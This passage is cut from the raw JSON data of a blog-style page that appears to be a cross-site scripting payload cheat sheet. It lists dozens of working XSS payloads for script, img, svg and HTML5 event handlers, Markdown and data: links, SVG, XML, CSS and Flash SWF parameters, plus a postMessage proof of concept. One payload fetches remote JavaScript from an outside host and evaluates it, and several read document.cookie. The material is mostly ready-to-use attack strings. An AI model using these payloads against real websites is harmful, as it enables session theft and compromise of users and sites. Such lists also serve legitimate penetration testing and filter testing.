HTML\\u002FApplications\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_13\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_13\",\"name\":\"47f7\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Common Payloads\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":15,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_14\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_14\",\"name\":\"3a69\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u002F\\u002F Basic payload\\n\\u003Cscript\\u003Ealert('XSS')\\u003C\\u002Fscript\\u003E\\n\\u003Cscr\\u003Cscript\\u003Eipt\\u003Ealert('XSS')\\u003C\\u002Fscr\\u003Cscript\\u003Eipt\\u003E\\n\\\"\\u003E\\u003Cscript\\u003Ealert('XSS')\\u003C\\u002Fscript\\u003E\\n\\\"\\u003E\\u003Cscript\\u003Ealert(String.fromCharCode(88,83,83))\\u003C\\u002Fscript\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_15\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_15\",\"name\":\"6b9c\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u002F\\u002F Img payload\\n\\u003Cimg src=x onerror=alert('XSS');\\u003E\\n\\u003Cimg src=x onerror=alert('XSS')\\u002F\\u002F\\n\\u003Cimg src=x onerror=alert(String.fromCharCode(88,83,83));\\u003E\\n\\u003Cimg src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));\\u003E\\n\\u003Cimg src=x:alert(alt) onerror=eval(src) alt=xss\\u003E\\n\\\"\\u003E\\u003Cimg src=x onerror=alert('XSS');\\u003E\\n\\\"\\u003E\\u003Cimg src=x onerror=alert(String.fromCharCode(88,83,83));\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_16\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_16\",\"name\":\"87fa\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u002F\\u002F Svg payload\\n\\u003Csvg\\fonload=alert(1)\\u003E\\n\\u003Csvg\\u002Fonload=alert('XSS')\\u003E\\n\\u003Csvg onload=alert(1)\\u002F\\u002F\\n\\u003Csvg\\u002Fonload=alert(String.fromCharCode(88,83,83))\\u003E\\n\\u003Csvg id=alert(1) onload=eval(id)\\u003E\\n\\\"\\u003E\\u003Csvg\\u002Fonload=alert(String.fromCharCode(88,83,83))\\u003E\\n\\\"\\u003E\\u003Csvg\\u002Fonload=alert(\\u002FXSS\\u002F)\\n\\u003Csvg\\u003E\\u003Cscript href=data:,alert(1) \\u002F\\u003E(`Firefox` is the only browser which allows self closing script)\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_17\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_17\",\"name\":\"ebf4\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u002F\\u002F Div payload\\n\\u003Cdiv onpointerover=\\\"alert(45)\\\"\\u003EMOVE HERE\\u003C\\u002Fdiv\\u003E\\n\\u003Cdiv onpointerdown=\\\"alert(45)\\\"\\u003EMOVE HERE\\u003C\\u002Fdiv\\u003E\\n\\u003Cdiv onpointerenter=\\\"alert(45)\\\"\\u003EMOVE HERE\\u003C\\u002Fdiv\\u003E\\n\\u003Cdiv onpointerleave=\\\"alert(45)\\\"\\u003EMOVE HERE\\u003C\\u002Fdiv\\u003E\\n\\u003Cdiv onpointermove=\\\"alert(45)\\\"\\u003EMOVE HERE\\u003C\\u002Fdiv\\u003E\\n\\u003Cdiv onpointerout=\\\"alert(45)\\\"\\u003EMOVE HERE\\u003C\\u002Fdiv\\u003E\\n\\u003Cdiv onpointerup=\\\"alert(45)\\\"\\u003EMOVE HERE\\u003C\\u002Fdiv\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_18\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_18\",\"name\":\"baf3\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS using HTML5 tags\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":20,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_19\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_19\",\"name\":\"fff6\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Cbody onload=alert(\\u002FXSS\\u002F.source)\\u003E\\n\\u003Cinput autofocus onfocus=alert(1)\\u003E\\n\\u003Cselect autofocus onfocus=alert(1)\\u003E\\n\\u003Ctextarea autofocus onfocus=alert(1)\\u003E\\n\\u003Ckeygen autofocus onfocus=alert(1)\\u003E\\n\\u003Cvideo\\u002Fposter\\u002Fonerror=alert(1)\\u003E\\n\\u003Cvideo\\u003E\\u003Csource onerror=\\\"javascript:alert(1)\\\"\\u003E\\n\\u003Cvideo src=_ onloadstart=\\\"alert(1)\\\"\\u003E\\n\\u003Cdetails\\u002Fopen\\u002Fontoggle=\\\"alert`1`\\\"\\u003E\\n\\u003Caudio src onloadstart=alert(1)\\u003E\\n\\u003Cmarquee onstart=alert(1)\\u003E\\n\\u003Cmeter value=2 min=0 max=10 onmouseover=alert(1)\\u003E2 out of 10\\u003C\\u002Fmeter\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_20\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_20\",\"name\":\"ed4e\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Cbody ontouchstart=alert(1)\\u003E \\u002F\\u002F Triggers when a finger touch the screen\\n\\u003Cbody ontouchend=alert(1)\\u003E   \\u002F\\u002F Triggers when a finger is removed from touch screen\\n\\u003Cbody ontouchmove=alert(1)\\u003E  \\u002F\\u002F When a finger is dragged across the screen.\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_21\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_21\",\"name\":\"3538\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS using a remote JS\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":21,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_22\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_22\",\"name\":\"7e03\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Csvg\\u002Fonload='fetch(\\\"\\u002F\\u002Fhost\\u002Fa\\\").then(r=\\u003Er.text().then(t=\\u003Eeval(t)))'\\u003E\\n\\u003Cscript src=14.rs\\u003E\\n\\u002F\\u002F you can also specify an arbitrary payload with 14.rs\\u002F#payload\\ne.g: 14.rs\\u002F#alert(document.domain)\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_23\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_23\",\"name\":\"f981\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS in hidden input\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":19,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_24\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_24\",\"name\":\"6e21\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Cinput type=\\\"hidden\\\" accesskey=\\\"X\\\" onclick=\\\"alert(1)\\\"\\u003E\\nUse CTRL+SHIFT+X to trigger the onclick event\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_25\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_25\",\"name\":\"d820\",\"type\":\"H3\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"DOM based XSS\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_26\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_26\",\"name\":\"3e61\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Based on a DOM XSS sink.\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":24,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_27\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_27\",\"name\":\"2902\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"#\\\"\\u003E\\u003Cimg src=\\u002F onerror=alert(2)\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_28\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_28\",\"name\":\"78f7\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS in JS Context\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":17,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_29\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_29\",\"name\":\"92d8\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"-(confirm)(document.domain)\\u002F\\u002F\\n; alert(1);\\u002F\\u002F\\n\\u002F\\u002F (payload without quote\\u002Fdouble quote from [@brutelogic](https:\\u002F\\u002Ftwitter.com\\u002Fbrutelogic)\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_30\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_30\",\"name\":\"a68d\",\"type\":\"H3\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS in files\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_31\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_31\",\"name\":\"95b8\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"** NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_32\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_32\",\"name\":\"6d5f\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Cname\\u003E\\n  \\u003Cvalue\\u003E\\u003C![CDATA[\\u003Cscript\\u003Econfirm(document.domain)\\u003C\\u002Fscript\\u003E]]\\u003E\\u003C\\u002Fvalue\\u003E\\n\\u003C\\u002Fname\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_33\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_33\",\"name\":\"e70d\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS in XML\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":10,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_34\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_34\",\"name\":\"7bd0\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Chtml\\u003E\\n\\u003Chead\\u003E\\u003C\\u002Fhead\\u003E\\n\\u003Cbody\\u003E\\n\\u003Csomething:script xmlns:something=\\\"http:\\u002F\\u002Fwww.w3.org\\u002F1999\\u002Fxhtml\\\"\\u003Ealert(1)\\u003C\\u002Fsomething:script\\u003E\\n\\u003C\\u002Fbody\\u003E\\n\\u003C\\u002Fhtml\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_35\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_35\",\"name\":\"c55a\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS in SVG\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":10,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_36\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_36\",\"name\":\"597a\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003C?xml version=\\\"1.0\\\" standalone=\\\"no\\\"?\\u003E\\n\\u003C!DOCTYPE svg PUBLIC \\\"-\\u002F\\u002FW3C\\u002F\\u002FDTD SVG 1.1\\u002F\\u002FEN\\\" \\\"http:\\u002F\\u002Fwww.w3.org\\u002FGraphics\\u002FSVG\\u002F1.1\\u002FDTD\\u002Fsvg11.dtd\\\"\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_37\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_37\",\"name\":\"d557\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Csvg version=\\\"1.1\\\" baseProfile=\\\"full\\\" xmlns=\\\"http:\\u002F\\u002Fwww.w3.org\\u002F2000\\u002Fsvg\\\"\\u003E\\n  \\u003Cpolygon id=\\\"triangle\\\" points=\\\"0,0 0,50 50,0\\\" fill=\\\"#009900\\\" stroke=\\\"#004400\\\"\\u002F\\u003E\\n  \\u003Cscript type=\\\"text\\u002Fjavascript\\\"\\u003E\\n    alert(document.domain);\\n  \\u003C\\u002Fscript\\u003E\\n\\u003C\\u002Fsvg\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_38\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_38\",\"name\":\"1575\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS in SVG (short)\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":18,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_39\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_39\",\"name\":\"bc98\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Csvg xmlns=\\\"http:\\u002F\\u002Fwww.w3.org\\u002F2000\\u002Fsvg\\\" onload=\\\"alert(document.domain)\\\"\\u002F\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_40\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_40\",\"name\":\"90b2\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Csvg\\u003E\\u003Cdesc\\u003E\\u003C![CDATA[\\u003C\\u002Fdesc\\u003E\\u003Cscript\\u003Ealert(1)\\u003C\\u002Fscript\\u003E]]\\u003E\\u003C\\u002Fsvg\\u003E\\n\\u003Csvg\\u003E\\u003CforeignObject\\u003E\\u003C![CDATA[\\u003C\\u002FforeignObject\\u003E\\u003Cscript\\u003Ealert(2)\\u003C\\u002Fscript\\u003E]]\\u003E\\u003C\\u002Fsvg\\u003E\\n\\u003Csvg\\u003E\\u003Ctitle\\u003E\\u003C![CDATA[\\u003C\\u002Ftitle\\u003E\\u003Cscript\\u003Ealert(3)\\u003C\\u002Fscript\\u003E]]\\u003E\\u003C\\u002Fsvg\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_41\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_41\",\"name\":\"bc4e\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS in Markdown\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":15,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_42\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_42\",\"name\":\"33d2\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"[a](javascript:prompt(document.cookie))\\n[a](j a v a s c r i p t:prompt(document.cookie))\\n[a](data:text\\u002Fhtml;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\\n[a](javascript:window.onerror=alert;throw%201)\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_43\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_43\",\"name\":\"8ba2\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS in SWF flash application\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":28,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_44\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_44\",\"name\":\"1187\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"Browsers other than IE: http:\\u002F\\u002F0me.me\\u002Fdemo\\u002Fxss\\u002Fxssproject.swf?js=alert(document.domain);\\nIE8: http:\\u002F\\u002F0me.me\\u002Fdemo\\u002Fxss\\u002Fxssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}\\nIE9: http:\\u002F\\u002F0me.me\\u002Fdemo\\u002Fxss\\u002Fxssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"A\",\"start\":24,\"end\":88,\"href\":\"http:\\u002F\\u002F0me.me\\u002Fdemo\\u002Fxss\\u002Fxssproject.swf?js=alert(document.domain);\",\"anchorType\":\"LINK\",\"userId\":null,\"linkMetadata\":null},{\"__typename\":\"Markup\",\"type\":\"A\",\"start\":94,\"end\":171,\"href\":\"http:\\u002F\\u002F0me.me\\u002Fdemo\\u002Fxss\\u002Fxssproject.swf?js=try{alert(document.domain)}catch(e){\",\"anchorType\":\"LINK\",\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_45\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_45\",\"name\":\"f9a2\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS in SWF flash application\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":28,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_46\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_46\",\"name\":\"2596\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"flashmediaelement.swf?jsinitfunctio%gn=alert`1`\\nflashmediaelement.swf?jsinitfunctio%25gn=alert(1)\\nZeroClipboard.swf?id=\\\\\\\"))} catch(e) {alert(1);}\\u002F\\u002F\u0026width=1000\u0026height=1000\\nswfupload.swf?movieName=\\\"]);}catch(e){}if(!self.a)self.a=!alert(1);\\u002F\\u002F\\nswfupload.swf?buttonText=test\\u003Ca href=\\\"javascript:confirm(1)\\\"\\u003E\\u003Cimg src=\\\"https:\\u002F\\u002Fweb.archive.org\\u002Fweb\\u002F20130730223443im_\\u002Fhttp:\\u002F\\u002Fappsec.ws\\u002FExploitDB\\u002FcMon.jpg\\\"\\u002F\\u003E\\u003C\\u002Fa\\u003E\u0026.swf\\nplupload.flash.swf?%#target%g=alert\u0026uid%g=XSS\u0026\\nmoxieplayer.swf?url=https:\\u002F\\u002Fgithub.com\\u002Fphwd\\u002Fpoc\\u002Fblob\\u002Fmaster\\u002Fvid.flv?raw=true\\nvideo-js.swf?readyFunction=alert(1)\\nplayer.swf?playerready=alert(document.cookie)\\nplayer.swf?tracecall=alert(document.cookie)\\nbanner.swf?clickTAG=javascript:alert(1);\\u002F\\u002F\\nio.swf?yid=\\\\\\\"));}catch(e){alert(1);}\\u002F\\u002F\\nvideo-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29\\nbookContent.swf?currentHTMLURL=data:text\\u002Fhtml;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4\\nflashcanvas.swf?id=test\\\\\\\"));}catch(e){alert(document.domain)}\\u002F\\u002F\\nphpmyadmin\\u002Fjs\\u002Fcanvg\\u002Fflashcanvas.swf?id=test\\\\”));}catch(e){alert(document.domain)}\\u002F\\u002F\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"CODE\",\"start\":0,\"end\":1046,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_47\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_47\",\"name\":\"af79\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS in CSS\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"STRONG\",\"start\":0,\"end\":10,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_48\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_48\",\"name\":\"8678\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003C!DOCTYPE html\\u003E\\n\\u003Chtml\\u003E\\n\\u003Chead\\u003E\\n\\u003Cstyle\\u003E\\ndiv  {\\n    background-image: url(\\\"data:image\\u002Fjpg;base64,\\u003C\\\\\\u002Fstyle\\u003E\\u003Csvg\\u002Fonload=alert(document.domain)\\u003E\\\");\\n    background-color: #cccccc;\\n}\\n\\u003C\\u002Fstyle\\u003E\\n\\u003C\\u002Fhead\\u003E\\n  \\u003Cbody\\u003E\\n    \\u003Cdiv\\u003Elol\\u003C\\u002Fdiv\\u003E\\n  \\u003C\\u002Fbody\\u003E\\n\\u003C\\u002Fhtml\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_49\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_49\",\"name\":\"284c\",\"type\":\"H3\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"XSS in PostMessage\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_50\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_50\",\"name\":\"9b32\",\"type\":\"BQ\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"If the target origin is asterisk * the message can be sent to any domain has reference to the child page.\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[{\"__typename\":\"Markup\",\"type\":\"EM\",\"start\":0,\"end\":105,\"href\":null,\"anchorType\":null,\"userId\":null,\"linkMetadata\":null}],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_51\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_51\",\"name\":\"2a58\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Chtml\\u003E\\n\\u003Cbody\\u003E\\n    \\u003Cinput type=button value=\\\"Click Me\\\" id=\\\"btn\\\"\\u003E\\n\\u003C\\u002Fbody\\u003E\",\"hasDropCap\":null,\"dropCapImage\":null,\"markups\":[],\"codeBlockMetadata\":null,\"iframe\":null,\"mixtapeMetadata\":null},\"Paragraph:3dfccc9ad6b7_52\":{\"__typename\":\"Paragraph\",\"id\":\"3dfccc9ad6b7_52\",\"name\":\"aba8\",\"type\":\"PRE\",\"href\":null,\"layout\":null,\"metadata\":null,\"text\":\"\\u003Cscript\\u003E\\ndocument.getElementById('btn').onclick = function(e){\\n    window.poc = window.open('http:\\u002F\\u002Fwww.redacted.com\\u002F#login');\\n    setTimeout(function(){\\n        window.poc.postMessage(\\n            {\\n                \\\"sender\\\": \\\"accounts\\\",\\n                \\\"url\\\": \\\"javascript:confirm('XSS')\\\",\\n            },\\n            '*'\\n        );\\n    }, 